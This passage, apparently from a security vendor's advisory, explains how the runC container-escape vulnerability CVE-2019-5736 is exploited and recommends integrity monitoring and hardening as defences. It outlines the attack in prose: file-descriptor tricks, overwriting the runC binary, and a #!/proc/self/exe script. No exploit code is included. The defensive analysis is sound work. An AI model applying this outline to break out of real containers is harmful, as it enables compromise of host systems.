The initial part of the attack involves enumerating the running processes in order to search for a running runC process. In a production environment, this means an attacker has access to an existing container, allowing software deployment and giving the attacker the ability to execute scripts inside a running container. Access can be obtained either through the exploitation of another vulnerability or a misconfiguration issue, or by owning a container inside a vulnerable environment.
This is followed by accessing the file descriptor using O_PATH flags:
After obtaining a valid file descriptor, it opens another file descriptor using O_WRONLY flags:
After successfully acquiring the fd2/second file descriptor, an attacker tries to write the payload; this is done in a loop.
To trigger this vulnerability, an attacker must be able to execute a binary within a container in a manner that results in spawning and terminating runC. This action allows an attacker to overwrite the runC binary.
To execute a payload, an attacker will rewrite the executed binary (eg. /bin/sh) inside a container by using a shell script #!/proc/self/exe. This will result in the execution of a modified runC binary payload.
This runC vulnerability illustrates how containers have to strike a balance between efficiency and security. However, setting up security measures early in the development pipeline can prevent greater security costs and additional work.
To protect container machines from vulnerabilities such as CVE-2019-5736, we recommend that organizations implement the following best practices:
The following Trend Micro Deep Security Integrity Monitoring rule detects changes to any binaries in the /usr/bin and /usr/sbin directories:
Due to the uniqueness of this exploit , we recommend that administrators implement scheduled and/or on-demand Integrity Monitoring scans.
In addition, Deep Security File Integrity Monitoring and Application Control provide out-of-the-box visibility for this malicious activity targeting a container host. If used in lockdown mode, this application control would prevent the execution of this malicious attack.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.